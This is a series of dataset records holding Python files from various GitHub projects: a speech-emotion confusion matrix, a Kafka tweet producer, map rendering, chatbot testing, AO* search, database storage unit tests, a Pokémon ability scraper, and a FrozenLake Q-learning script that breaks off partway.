\"angry\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"fearful\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"disgust\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n },\n \"surprised\": {\n \"neutral\": 0,\n \"calm\": 0,\n \"happy\": 0,\n \"sad\": 0,\n \"angry\": 0,\n \"fearful\": 0,\n \"disgust\": 0,\n \"surprised\": 0\n }\n}\n\npath = os.path.dirname(os.getcwd())\n\n\ndef create_confusion_matrix():\n\n itr = 0\n\n pklfile = path + '/Emotion_Voice_Detection_Model_dataset.pkl'\n with open(pklfile, 'rb') as file:\n Emotion_Voice_Detection_Model = pickle.load(file)\n\n pklfile = path + \"/final_x_train.pkl\"\n with open(pklfile, 'rb') as file:\n x_values = pickle.load(file)\n\n pklfile = path + \"/final_x_test.pkl\"\n with open(pklfile, 'rb') as file:\n x_test = pickle.load(file)\n\n pklfile = path + \"/final_y_test.pkl\"\n with open(pklfile, 'rb') as file:\n y = pickle.load(file)\n\n scaler = MinMaxScaler()\n x_new = scaler.fit(x_values)\n\n for i in range(len(x_test)):\n\n emotion = y[i]\n\n feature = [x_test[i]]\n feature = np.array(feature)\n feature = scaler.transform(feature)\n\n pred_emotion = Emotion_Voice_Detection_Model.predict(feature)[0]\n\n emotion_dict[emotion][pred_emotion] = emotion_dict[emotion][pred_emotion] + 1\n\n if itr == 100:\n print(emotion_dict)\n itr = itr + 1\n\n print(emotion_dict)\n","repo_name":"sid056/SER-project","sub_path":"prediction/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37940237506","text":"import pprint\nimport sqlite3\nimport json\nimport time\nfrom kafka import KafkaProducer\nimport os\n\ndef json_serializer(data):\n \"\"\"Returns a JSON serialized dump of the given data.\"\"\"\n\n return 
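(\n        # KafkaProducer applies value_serializer to every value handed to send(),\n        # so this helper must return bytes and callers should pass plain dicts.\n        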
json.dumps(data).encode(\"utf-8\")\n    )\n\n\n\nif __name__ == \"__main__\":\n    batch_size, timeout = 100, 1\n\n    print(\"-----Tweet Data Producer Stream-----\")\n\n    producer = KafkaProducer(\n        bootstrap_servers=[\"localhost:9092\"],\n        value_serializer=json_serializer\n    )\n\n    print(\"Kafka Producer started.\")\n\n    try:\n        #categories = [\"Gaming\", \"Oil\", \"EVs\", \"Tech\"]\n        table_names = [\"reduced_tweet_counts\"]\n\n        #for category in categories:\n        for table in table_names:\n            #connection = sqlite3.connect(os.path.join(os.path.dirname(__file__),f\"../Database/fypdb-{category}.sqlite\"))\n            connection = sqlite3.connect(os.path.join(os.path.dirname(__file__),f\"../Database/fypdb-Pharma.sqlite\"))\n            #print(f\"Connected to FYPDB-{category} Database.\")\n            print(f\"Connected to FYPDB Database.\")\n            cursor = connection.cursor()\n            query = f\"SELECT * FROM {table}\"\n            cursor.execute(query)\n\n\n            records = cursor.fetchall()\n            \n            for record in records:\n                data = dict()\n                data['category'] = record[0]\n                #data['ticker'] = record[1]\n                data['tweetDate'] = record[1]\n                data['count'] = record[2]\n                data['tweet'] = record[3]\n                \n                \n                # pass the plain dict; value_serializer already JSON-encodes it,\n                # so pre-dumping here would double-serialize the payload\n                producer.send('tweets-pharma-topic', data) #topic: tweets-pharma-topic\n                pprint.pprint(data)\n\n\n                time.sleep(10) #Sleep before producing the next batch of Tweets \n\n            cursor.close()\n            connection.close()  \n\n        \n    except sqlite3.Error as error:\n        #print(f\"Failed to connect to FYPDB-{category} Database.\")\n        print(f\"Failed to connect to FYPDB Database.\")\n        exit(0)\n\n        \n    finally:\n        if connection:\n            connection.close()\n            #print(f\"Disconnected from FYPDB-{category} Database.\")\n            print(f\"Disconnected from FYPDB Database.\")\n            exit(0)\n","repo_name":"svishakan/Social-Media-Based-Stock-Market-Analysis","sub_path":"Kafka/TweetProducer2.py","file_name":"TweetProducer2.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"24825096775","text":"from PIL import Image, ImageDraw, ImageFilter, ImageEnhance\nimport matplotlib.pyplot as plt\nimport math\n\n\nmapName = 'map1'\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\n\nfilepath = './maps/'+mapName+'.map'\nlines = []\n\nwith open(filepath) as fp:\n\n    recordinglines = False\n    line = fp.readline()\n    cnt = 1\n\n    while line:\n\n        print(\"Reading Line {}: {}\".format(cnt, line.strip()))\n        line = fp.readline()\n        cnt += 1\n\n        if recordinglines:\n            if line.strip() != \"DATA\":\n                lines.append(line.strip())\n\n        if line.strip() == \"LINES\":\n            recordinglines = True\n\nlines.remove('')\nprint(\"Number of Lines: {}\".format(len(lines)))\n\n\nformattedLines = []\n\nfor line in lines:\n    linedata = line.split()\n    formattedLines.append({'p1': [int(linedata[0]), int(linedata[1])], 'p2':[int(linedata[2]), int(linedata[3])]})\n\n\n\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\n\ngrid = []\ngridcellsize = 100\noriginPoint = []\nnumberOfCellsBuffer = 0\n\nminX = 0\nminY = 0\nmaxX = 0\nmaxY = 0\n\nfor line in formattedLines:\n    p1x = line['p1'][0]\n    p1y = line['p1'][1]\n    p2x = line['p2'][0]\n    p2y = line['p2'][1]\n\n    if p1x < minX:\n        minX = p1x\n    if p1y < minY:\n        minY = p1y\n\n    if p2x < minX:\n        minX = p2x\n    if p2y < minY:\n        minY = p2y\n\n    if p1x > maxX:\n        maxX = p1x\n    if p1y > maxY:\n        maxY = p1y\n\n    if p2x > maxX:\n        maxX 
= p2x\n    if p2y > maxY:\n        maxY = p2y\n\nprint(\"minX {} minY {} maxX {} maxY {}\".format(minX, minY, maxX, maxY))\n\nprint(originPoint)\n\nlengthX = maxX - minX\nlengthY = maxY - minY\n\nprint(lengthX)\nprint(lengthY)\n\n\n\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------\nimg_small = Image.new('RGB', (int(lengthX / gridcellsize) + 1, int(lengthY / gridcellsize)+1), (255, 255, 255))\nxadj = abs(minX)\nyadj = abs(minY)\n\nfor line in formattedLines:\n    draw = ImageDraw.Draw(img_small)\n    draw.line((int((line['p1'][0] + xadj)/gridcellsize), int((line['p1'][1] + yadj)/gridcellsize), int((line['p2'][0] + xadj)/gridcellsize), int((line['p2'][1] + yadj)/gridcellsize)), fill=0)\n    del draw\n\n\n#img_filtered = img_small.filter(ImageFilter.BoxBlur(3))\nimg_filtered = img_small.filter(ImageFilter.GaussianBlur(3))\n\nenhancer = ImageEnhance.Contrast(img_filtered)\nimg_filtered = enhancer.enhance(2.0)\n\n\n\n#img_filtered = img_small.filter(ImageFilter.SMOOTH)\nimg_combined = Image.new('RGB', (int(lengthX / gridcellsize) + 1, int(lengthY / gridcellsize)+1), (255, 255, 255))\n\n\npixel_small = img_small.load()\npixel_filtered = img_filtered.load()\npixel_combined = img_combined.load()\n\nwidth, height = img_small.size\nfor y in range(height):\n    for x in range(width):\n        if pixel_small[x, y] == (0, 0, 0):\n            pixel_combined[x, y] = (0,0,0)\n        if pixel_small[x, y] == (255, 255, 255):\n            pixel_combined[x, y] = pixel_filtered[x, y]\n\n\n\n#img_small.show()\n#img_filtered.show()\nimg_combined.show()\n\n\nrotated_img = img_combined.transpose(Image.FLIP_TOP_BOTTOM)\n\nrotated_img.show()\nrotated_img.save(mapName+\".png\")","repo_name":"Sam-Fuller/Advanced-Mobile-Robotics-Assessment-2","sub_path":"pythonCode/ocm.py","file_name":"ocm.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41892866931","text":"\"\"\"Model testing module.\n\nFile: test.py\nAuthor: Jiří Čechák\nDate: 12.04.2018\nPython Version: 3.6.3\n\nThis module contains a function for testing the selected trained model on testing data using the BLEU metric.\n\"\"\"\n\nfrom __future__ import print_function\nfrom time import time\n\nfrom utils import printErrorAndExit, timestampToTime\nimport constants as c\nfrom dataUtils import loadVocabulary, getFileWithLastSavedWeights, loadTestingDataAndTokenize, tokenizedInputToIds\nfrom model import createModel, testBLEU\n\n\ndef test(modelNumber, dataLimit):\n    \"\"\"Testing on testing data using BLEU metric.\n\n    Args:\n        modelNumber: number of a model to test\n        dataLimit: limit for testing data\n    \"\"\"\n\n    print(\"Testing\")\n\n    savedWeightsFile, _, _ = getFileWithLastSavedWeights(modelNumber, None)\n\n    if savedWeightsFile is None:\n        printErrorAndExit(c.ERROR_WEIGHTS_FILE_NOT_FOUND)\n\n    vocabulary, wordToIndexVocabulary = loadVocabulary()\n\n    encTokens, decTokens = loadTestingDataAndTokenize(\n        c.TEST_CONTEXT_FILEPATH, c.TEST_UTTERANCE_FILEPATH, dataLimit, wordToIndexVocabulary)\n\n    if len(encTokens) < c.MIN_TEST_DATA_SIZE:\n        printErrorAndExit(c.ERROR_MIN_TEST_DATA_SIZE)\n\n    encTokensIds = []\n\n    for tokens in encTokens:\n        encTokensIds.append(tokenizedInputToIds(tokens, wordToIndexVocabulary)[0])\n\n    model = createModel(modelNumber, vocabulary, None, savedWeightsFile)\n\n    print(\"\")\n\n    timeStart = time()\n\n    bleuTestScore = testBLEU(encTokensIds, decTokens, model, vocabulary, text=\"Testing on testing 
data\")\n\n print(\"BLEU testing score: {}\".format(bleuTestScore))\n\n testDataFilepath = c.MODEL1_TESTDATA_FILEPATH if modelNumber == 1 else c.MODEL2_TESTDATA_FILEPATH if modelNumber == 2 else c.MODEL3_TESTDATA_FILEPATH\n\n try:\n testDataFile = open(testDataFilepath, \"w\")\n testDataFile.write(\"{}\\n\".format(bleuTestScore))\n testDataFile.close()\n except Exception as e:\n print(e)\n \n timeEnd = time()\n timeTotal = timeEnd - timeStart\n \n print(\"\\nTOTAL TIME: {}\".format(timestampToTime(timeTotal)))","repo_name":"jirkacechak/chatbot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25282135667","text":"class Graph:\n def __init__(self, startNode, graph, heuristicNodeList):\n self.start=startNode\n self.graph=graph\n self.h=heuristicNodeList\n self.parent={}\n self.solutionGraph={}\n self.status={}\n\n def getNeighbors(self,v):\n return self.graph.get(v,'')\n \n def getStatus(self,v):\n return self.status.get(v,0)\n \n def setStatus(self,v,value):\n self.status[v]=value\n\n def applyAOstar(self):\n self.aoStar(self.start,False)\n\n def printSolution(self):\n print(\"traverse the graph from start node:\",self.start)\n print(\"--------------------\")\n print(self.solutionGraph)\n print(\"----------------------------------\")\n\n def getHeuristicNodeValue(self,v):\n return self.h.get(v,0)\n \n def setHeuristicNodeValue(self,v,value):\n self.h[v]=value\n\n def computeMinimumCostChildNodes(self, v):\n minimumCost=0\n costToChildNodeListDict={}\n costToChildNodeListDict[minimumCost]=[]\n flag=True #determine if its processing the first set of child nodes.\n for nodeInfoTupleList in self.getNeighbors(v):\n cost=0\n nodeList=[]\n for n, weight in nodeInfoTupleList:\n cost=cost+self.getHeuristicNodeValue(n)+weight\n nodeList.append(n)\n if flag==True:\n minimumCost=cost\n flag=False\n costToChildNodeListDict[minimumCost]=nodeList\n else:\n if minimumCost>cost:\n minimumCost=cost\n costToChildNodeListDict[minimumCost]=nodeList\n return minimumCost, costToChildNodeListDict[minimumCost]\n\n def aoStar(self, v, backTracking):\n print(\"heuristic values: \",self.h)\n print(\"solution graph: \",self.solutionGraph)\n print(\"currently processing node: \",v)\n print(\"------------------------------\")\n if self.getStatus(v)>=0: #unexplored node\n min, nodeList = self.computeMinimumCostChildNodes(v)\n print(min,nodeList)\n self.setHeuristicNodeValue(v,min)\n self.setStatus(v,len(nodeList))\n solution=True\n for n in nodeList:\n self.parent[n]=v\n if self.getStatus(n)!=-1:\n solution=False\n if solution==True:\n self.setStatus(v,-1)\n self.solutionGraph[v]=nodeList\n if v!=self.start:\n self.aoStar(self.parent[v],True)\n if backTracking==False:\n for node in nodeList:\n self.setStatus(node,0)\n self.aoStar(node,False)\n\nprint(\"Graph 1\")\nh = {'A':1,'B':6,'C':2,'D':12,'E':2,'F':1,'G':5,'H':7,'I':7,'J':1} \ngraph1= {\n 'A':[[('B',1),('C',1)],[('D',1)]],\n 'B':[[('G',1)],[('H',1)]],\n 'C': [[('J', 1)]],\n 'D': [[('E', 1), ('F', 1)]],\n 'G': [[('I', 1)]]\n} \ng1=Graph('A',graph1,h) \ng1.applyAOstar()\ng1.printSolution()","repo_name":"ShiviDev/aimlLab","sub_path":"aostar.py","file_name":"aostar.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71467655845","text":"#!/usr/bin/python3\n\"\"\"\nUnit Test for DataBase Storage Class\n\"\"\"\nimport 
unittest\nfrom datetime import datetime\nimport models\nimport json\nimport os\nimport inspect\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\n\nstorage = models.storage\nenviron = os.environ\nif environ.get('HBNB_TYPE_STORAGE') == 'db':\n DBStorage = models.db_storage.DBStorage\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestDBStorageDocs(unittest.TestCase):\n \"\"\"Class for testing DB Storage docs\"\"\"\n\n if environ.get('HBNB_TYPE_STORAGE') == 'db':\n all_funcs = inspect.getmembers(DBStorage, inspect.isfunction)\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n.................................')\n print('..... Testing Documentation .....')\n print('...... For DBStorage Class ......')\n print('.................................\\n\\n')\n\n def test_doc_file(self):\n \"\"\"... documentation for the file\"\"\"\n actual = models.db_storage.__doc__\n self.assertIsNotNone(actual)\n\n def test_doc_class(self):\n \"\"\"... documentation for the class\"\"\"\n actual = DBStorage.__doc__\n self.assertIsNotNone(actual)\n\n def test_all_function_docs(self):\n \"\"\"... tests for ALL DOCS for all functions in db_storage file\"\"\"\n AF = TestDBStorageDocs.all_funcs\n for f in AF:\n self.assertIsNotNone(f[1].__doc__)\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestTracebackNullError(unittest.TestCase):\n \"\"\"testing for throwing Traceback erros:\n missing attributes that Cannot be NULL\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n....................................')\n print('.......... Testing DBStorage .......')\n print('...... Trying to Throw Errors ......')\n print('....................................\\n\\n')\n\n def tearDown(self):\n \"\"\"tidies up tests that throw errors\"\"\"\n storage.rollback_session()\n\n def test_state_no_name(self):\n \"\"\"... checks to create a state with no name\"\"\"\n with self.assertRaises(Exception) as context:\n s = State()\n s.save()\n self.assertTrue('\"Column \\'name\\' cannot be null\"'\n in str(context.exception))\n\n def test_city_no_state(self):\n \"\"\"... checks to create a city with invalid state\"\"\"\n with self.assertRaises(Exception) as context:\n c = City(name=\"Tapioca\", state_id=\"NOT VALID\")\n c.save()\n self.assertTrue('a child row: a foreign key constraint fails'\n in str(context.exception))\n\n def test_place_no_user(self):\n \"\"\"... checks to create a place with no city\"\"\"\n with self.assertRaises(Exception) as context:\n p = Place()\n p.save()\n self.assertTrue('\"Column \\'city_id\\' cannot be null\"'\n in str(context.exception))\n\n def test_review_no_text(self):\n \"\"\"... checks to create a Review with no text\"\"\"\n with self.assertRaises(Exception) as context:\n r = Review()\n r.save()\n self.assertTrue('\"Column \\'text\\' cannot be null\"'\n in str(context.exception))\n\n def test_amenity_no_name(self):\n \"\"\"... checks to create an amenity with no name\"\"\"\n with self.assertRaises(Exception) as context:\n a = Amenity()\n a.save()\n self.assertTrue('\"Column \\'name\\' cannot be null\"'\n in str(context.exception))\n\n def test_user_no_name(self):\n \"\"\"... 
checks to create a user with no email\"\"\"\n with self.assertRaises(Exception) as context:\n u = User()\n u.save()\n self.assertTrue('\"Column \\'email\\' cannot be null\"'\n in str(context.exception))\n\n\n@unittest.skipIf(environ.get('HBNB_TYPE_STORAGE') != 'db',\n \"DB Storage doesn't use FileStorage\")\nclass TestAllInstances(unittest.TestCase):\n \"\"\"testing for Various State Class instances & methods\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"sets up the class for this round of tests\"\"\"\n print('\\n\\n....................................')\n print('.......... Testing DBStorage .......')\n print('. State, City, User, Place Amenity .')\n print('....................................')\n storage.delete_all()\n cls.s = State(name=\"California\")\n cls.c = City(state_id=cls.s.id,\n name=\"San Francisco\")\n cls.u = User(email=\"betty@holbertonschool.com\",\n password=\"pwd\")\n cls.p1 = Place(user_id=cls.u.id,\n city_id=cls.c.id,\n name=\"a house\")\n cls.p2 = Place(user_id=cls.u.id,\n city_id=cls.c.id,\n name=\"a house two\")\n cls.a1 = Amenity(name=\"Wifi\")\n cls.a2 = Amenity(name=\"Cable\")\n cls.a3 = Amenity(name=\"Bucket Shower\")\n objs = [cls.s, cls.c, cls.u, cls.p1, cls.p2, cls.a1, cls.a2, cls.a3]\n for obj in objs:\n obj.save()\n\n def setUp(self):\n \"\"\"initializes new user for testing\"\"\"\n self.s = TestAllInstances.s\n self.c = TestAllInstances.c\n self.u = TestAllInstances.u\n self.p1 = TestAllInstances.p1\n self.p2 = TestAllInstances.p2\n self.a1 = TestAllInstances.a1\n self.a2 = TestAllInstances.a2\n self.a3 = TestAllInstances.a3\n\n def test_all_reload_save(self):\n \"\"\"... checks if all(), save(), and reload function\n in new instance. This also tests for reload\"\"\"\n actual = 0\n db_objs = storage.all()\n for obj in db_objs.values():\n for x in [self.s.id, self.c.id, self.u.id, self.p1.id]:\n if x == obj.id:\n actual += 1\n self.assertTrue(actual == 4)\n\n def test_new(self):\n \"\"\"... checks if new() function returns newly created instance\"\"\"\n actual = False\n self.s_new = State(name=\"Illinois\")\n self.s_new.save()\n db_objs = storage.all()\n for obj in db_objs.values():\n if obj.id == self.s_new.id:\n actual = True\n self.assertTrue(actual)\n\n def test_delete(self):\n \"\"\"... checks if all(), save(), and reload function\n in new instance. 
This also tests for reload\"\"\"\n        actual = True\n        check_cls = type(self.s).__name__\n        check = self.s.name\n        self.s.delete()\n        storage.save()\n        db_objs = storage.all()\n        for obj in db_objs.values():\n            if type(obj).__name__ == check_cls and obj.name == check:\n                actual = False\n        self.assertTrue(actual)\n\nif __name__ == '__main__':\n    unittest.main()\n    storage.delete_all()\n","repo_name":"KatyaKalache/AirBnB_clone_v2","sub_path":"tests/test_models/test_engine/test_db_storage.py","file_name":"test_db_storage.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28829395715","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom typing import List, NamedTuple\nimport psycopg2\n\nurl = \"https://pokemondb.net/ability\"\nrequest = Request(\n    url,\n    headers={'User-Agent': 'Mozilla/5.0'}\n)\n\npage = urlopen(request)\npage_content_bytes = page.read()\npage_html = page_content_bytes.decode(\"utf-8\")\nsoup = BeautifulSoup(page_html, \"html.parser\")\n\nAbility = []\nability_rows = soup.find_all(\"table\", id=\"abilities\")[0].find_all(\"tbody\")[0].find_all(\"tr\")\nfor ability in ability_rows[0:320]:\n    ability_name = ability.find_all(\"td\")[0].find_all(\"a\")[0].getText()\n    print(ability_name)\n    ability_description = ability.find_all(\"td\", {\"class\": \"cell-med-text\"})[0].getText()\n    print(ability_description)\n\n    Ability.append((ability_name, ability_description))\n\n\n    conn = psycopg2.connect(dbname='postgres', user='User', password='', host='localhost')\n    cursor = conn.cursor()\n\n    cursor.executemany(\"INSERT INTO abilities VALUES (%s, %s)\", Ability)\n    conn.commit()\n    conn.close()\n\n    Ability.clear()\n\n\n\n\n\n\n\n","repo_name":"NotBadTime/Python_Parcer","sub_path":"Abilities.py","file_name":"Abilities.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37036639609","text":"\"\"\"\nCreated on Fri Jul 17 19:10:42 2020\n@author: David\nEdited on Jul 21, 2020 by Jason\n\nThis is an algorithm to implement Q learning on a Frozen Lake game\n\nThis code is created by using the following Github repo as a template:\n    https://github.com/OmarAflak/FrozenLake-QLearning/blob/master/qlearning.py\n\"\"\"\n#%% INITIALIZATION AND FILE DIRECTORIES\n\n#initialize\nfrom time import sleep\nimport numpy as np\nimport gym\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.animation as animation\nimport seaborn\nimport os\nfrom os import startfile\n\nfn_path = 'QL_Iterations.mp4' #filename for path video\nfn_epsilon = 'QL_Eps.png' #filename for epsilon vs iteration graph\nfn_heatmap = 'QL_Heatmap.mp4' #filename for heatmap video\ncdir = os.path.abspath(os.getcwd()) #current directory (directory files will be saved to)\nviddir_path = os.path.join(cdir,fn_path) #directory path video will be saved to\nfigdir_eps = os.path.join(cdir,fn_epsilon) #directory graph image will be saved to\nviddir_hm = os.path.join(cdir,fn_heatmap) #directory heatmap video will be saved to\n\n#%% GENERATE ENVIRONMENT\nenv = gym.make('FrozenLake8x8-v0')\n\n# Environment - uncomment one of these for custom maps (required for animations)\n#custom_map = ['SFFF','FHFH','FFFH','HFFG'] #standard 4x4 map\ncustom_map = ['SFFFFFFF', 'FFFFFFFF', 'FFFHFFFF', 'FFFFFHFF', 'FFFHFFFF', 'FHHFFFHF', 'FHFFHFHF', 'FFFHFFFG'] # added by Jason - standard 8x8 map (uncomment for custom 
map)\n#env = gym.make('FrozenLake-v0', is_slippery=True, desc=custom_map)\n\nprint(\"\")\nprint('Lake Visualization:')\nprint('S=Start, F=Frozen, H=Hole, G=Goal')\nenv.render()\n\n#Create numerical representation of frozen lake (as an array)\n#-1 = start, 0 = hole, 1 = frozen, 2 = end\nnrow = env.nrow\nncol = env.ncol\nlake = [[None]*ncol for _ in range(nrow)]\nfor i in range(0,len(custom_map)):\n tmpstr = custom_map[i]\n \n for j in range(0,len(tmpstr)):\n if tmpstr[j] == 'S':\n lake[i][j] = -1\n elif tmpstr[j] == 'H':\n lake[i][j] = 0\n elif tmpstr[j] == 'F':\n lake[i][j] = 1\n elif tmpstr[j] == 'G':\n lake[i][j] = 2\nlake = np.array(lake) \n\ninputCount = env.observation_space.n\nactionsCount = env.action_space.n\n \n#%% DEFINE FUNCTIONS FOR VISUALIZATION\n\nvizit = 1000 #number of iterations between path visualizations\nhmit = 15 #numer of iterations between heatmap visualizations\n\ndef movefun(s0,s1,moves):\n if s1-s0 == -1: #robot moved left = 0\n moves.append(0)\n elif s1-s0 == ncol: #robot moved down = 1\n moves.append(1)\n elif s1-s0 == 1: #robot moved right = 2\n moves.append(2)\n elif s1-s0 == -ncol: #robut moved up = 3\n moves.append(3)\n else: #robot didn't move = 4\n moves.append(4)\n \n return moves\n\ndef robotloc(moves,x0,y0):\n x = [None]*(len(moves))\n y = [None]*(len(moves))\n \n i = 0\n for m in moves: \n if m == 0:\n x[i] = x[i-1]-1\n y[i] = y[i-1]\n elif m == 1:\n x[i] = x[i-1]\n y[i] = y[i-1]-1\n elif m == 2:\n x[i] = x[i-1]+1\n y[i] = y[i-1]\n elif m == 3:\n x[i] = x[i-1]\n y[i] = y[i-1]+1\n elif m == 4:\n x[i] = x[i-1]\n y[i] = y[i-1]\n else:\n x[i] = x0\n y[i] = y0\n \n i+=1\n return x, y\n\ndef animatepath(j):\n if j == 0:\n line.set_xdata(x[j])\n line.set_ydata(y[j])\n else:\n k=j\n while k > 0:\n if moves[k] == -1:\n break\n k = k-1\n line.set_xdata(x[k:j+1])\n line.set_ydata(y[k:j+1])\n point.set_xdata(x[j])\n point.set_ydata(y[j])\n plt.title('Episode %i' %itnum[j])\n\n return line,\n\ndef animateheatmap(j):\n plt.cla()\n Val_reshaped = np.reshape(Qval[j,:],(nrow,ncol))\n p = seaborn.heatmap(Val_reshaped, cmap=cmap, vmin=vmin, vmax=vmax, cbar=False,\n square=True, xticklabels=ncol+1, yticklabels=nrow+1,\n linewidths=.5, ax=ax3, annot=True, fmt=\".3f\")\n for i in range(len(lake)):\n for ii in range(len(lake[0])):\n plt.text(i+0.4,ii+0.25,custom_map[ii][i],fontsize=14)\n \n for k in range(len(Qdir[j])):\n xk = (k % ncol) + 0.4\n yk = (k // nrow) + 0.8\n arrow = Qdir[j,k]\n if arrow == 0:\n plt.text(xk, yk, u'\\u2190', fontsize=14)\n elif arrow == 1:\n plt.text(xk, yk, u'\\u2193', fontsize=14)\n elif arrow == 2:\n plt.text(xk, yk, u'\\u2192', fontsize=14)\n else:\n plt.text(xk, yk, u'\\u2191', fontsize=14)\n \n plt.title('Episode %i' %Qit[j])\n \n return p\n\n#%% TRAIN ROBOT\n# Initialize Q-Table\ninputCount = env.observation_space.n\nactionsCount = env.action_space.n\n#Set inital values of Q table to zero\nQ = {}\nfor i in range(inputCount):\n Q[i] = np.zeros(actionsCount)\n\n\"\"\"\nThe parameters listed are as follows:\n lr = learning rate\n lrMin = minimum learning rate\n lrDecay = rate of decay of learning rate\n gamma = discount factor\n epsilon = variable specifying how often we choose a random action\n epsilonMin = minimum epsilon value\n epsilonDecay = rate of epsilon decay\n episodes = # of training episodes to run\n\nThe way this algorithm works is by first initailizing a 'Q-table' which, at each location, stores 'quality' values for each possible action\nThese quality values are based on anticipated future reward\nInitially, the Q table is set 
randomly and the algorithm updates it each iteration (or episode) based on reward\nWhen the actor goes to make a decision on what action to take, the actor will either pick the action which has the highest q value or pick a random action\nThe chance that the actor picks a random action rather than an action based on q value is based on the hyperparameter 'epsilon'\nThis randomness helps the actor explore new paths rather than getting trapped in one path\nThe epsilon value starts high to encourage exploration but slowly decays each iteration as the specified path should become more clear\n\"\"\"\n\n## Hyperparameters\nlr = 0.33\nlrMin = 0.001\nlrDecay = 0.99999\ngamma = 1.0\nepsilon = 1.0\nepsilonMin = 0.001\nepsilonDecay = 0.97\nepisodes = 4000\nrewardWin = 1\nrewardLose = -1\nrewardMove = 0\n\n# Variables needed to create visualizations\nepsplot = [epsilon]\nQval = np.zeros((int(np.ceil(episodes/hmit)+1),int(nrow*ncol)))\nQdir = np.zeros((int(np.ceil(episodes/hmit)+1),int(nrow*ncol)))\nQit = np.zeros(int(np.ceil(episodes/hmit)+1))\n\n\n# Training\navgR = np.zeros(int(episodes/50))\nfor i in range(episodes):\n #print(\"Episode {}/{}\".format(i + 1, episodes))\n s = env.reset()\n done = False\n\n # update list of moves to say it reset - for path movie\n if i == 0 or (i+1) % vizit == 0 or i == episodes-1:\n if i == 0:\n moves = [-1]\n itnum = [1]\n else:\n moves.append(-1)\n itnum.append(i+1)\n\n # Iterate the path\n while not done:\n #determine if we want to explore or base our action on the Q table\n if np.random.random() < epsilon:\n a = np.random.randint(0, actionsCount)\n else:\n a = np.argmax(Q[s])\n \n #evaluate the result of the action taken\n newS, r, done, _ = env.step(a)\n \n #Manually change the reward structure to negatively reward travel and falling in holes and positvely reward reaching the goal\n if done and r==0:\n r = rewardLose\n elif done and r==1:\n r = rewardWin\n else:\n r = rewardMove\n \n #Update the Q table with the Bellman equation\n Q[s][a] = Q[s][a] + lr * (r + gamma * np.max(Q[newS]) - Q[s][a])\n \n #Update moves array with the last move - for path movie\n if i == 0 or (i+1) % vizit == 0 or i == episodes-1:\n moves = movefun(s,newS,moves)\n itnum.append(i+1)\n\n # Update s, learning rate, and epsilon\n s = newS\n \n #decay the learning rate\n if lr > lrMin:\n lr *= lrDecay\n\n #decrease exploration rate if we reach the goal\n if r==rewardWin and epsilon > epsilonMin:\n epsilon *= epsilonDecay\n \n #store epsilon value for epsilon vs iteration plot\n epsplot.append(epsilon)\n \n #store Q matrix values for heatmap plot\n if i==0:\n Qit[i] = i+1\n for tile in range(nrow*ncol):\n Qval[i,tile] = max(Q[tile])\n Qdir[i,tile] = np.argmax(Q[tile])\n elif (i+1) % hmit == 0:\n Qit[int((i+1)/hmit)] = i+1\n for tile in range(nrow*ncol):\n Qval[int((i+1)/hmit),tile] = max(Q[tile])\n Qdir[int((i+1)/hmit),tile] = np.argmax(Q[tile])\n elif i == episodes-1:\n Qit[-1] = i+1\n for tile in range(nrow*ncol):\n Qval[-1,tile] = max(Q[tile])\n Qdir[-1,tile] = np.argmax(Q[tile])\n \n #Test performance over training iterations\n if i%50==0:\n for j in range(100):\n s = env.reset()\n done = False\n while not done:\n a = np.argmax(Q[s])\n newS, r, done, _ = env.step(a)\n s = newS\n avgR[int(i/50)] += r/100.\n\nindex = [i for i in range(int(episodes/50))]\nindex = np.array(index)*50\nplt.plot(index,avgR)\nplt.xlabel('Iteration')\nplt.ylabel('Average Success Rate')\nplt.title('Q-Learning - Average Success Rate over 100 Episodes') \n \n\nprint(\"\")\nprint(\"Learning Rate :\", 
